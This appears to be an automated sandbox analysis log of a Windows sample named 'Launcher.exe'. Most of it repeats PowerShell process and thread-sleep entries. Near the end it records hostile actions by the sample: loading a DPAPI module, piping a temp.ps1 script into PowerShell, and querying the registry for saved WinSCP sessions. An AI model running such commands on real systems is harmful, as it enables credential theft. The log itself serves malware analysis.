        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9095
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 810
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1567
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5702
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1417
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5429
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1702
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4561
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1427
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4772
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1795
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4332
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1748
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4489
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1498
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4465
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2077
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3960
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1800
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4416
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1994
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3808
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1402
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4520
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2665
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3395
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1633
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3918
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1745
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4067
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bak
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bak
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.dll
        Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904 Thread sleep count: 9095 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904 Thread sleep count: 810 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668 Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748 Thread sleep count: 1567 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748 Thread sleep count: 5702 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4552 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176 Thread sleep count: 1417 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876 Thread sleep count: 5429 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep count: 1702 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep count: 4561 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716 Thread sleep count: 1427 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724 Thread sleep count: 4772 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4860 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4752 Thread sleep count: 1795 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4752 Thread sleep count: 4332 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532 Thread sleep count: 1748 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532 Thread sleep count: 4489 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1624 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5440 Thread sleep count: 1498 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 448 Thread sleep count: 4465 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 548 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep count: 2077 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396 Thread sleep count: 3960 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5156 Thread sleep count: 1800 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5156 Thread sleep count: 4416 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268 Thread sleep count: 1994 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268 Thread sleep count: 3808 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260 Thread sleep count: 1402 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260 Thread sleep count: 4520 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180 Thread sleep count: 2665 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180 Thread sleep count: 3395 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep count: 1633 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep count: 3918 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 392 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220 Thread sleep count: 1745 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832 Thread sleep count: 4067 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 428 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFC9FC33ECA GetSystemInfo,22_2_00007FFC9FC33ECA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\catroot2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\AppxSip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SYSTEM32\OpcServices.DLL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\96630093aeac18623f8eafa5a10c8ba7\System.Data.ni.dll
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
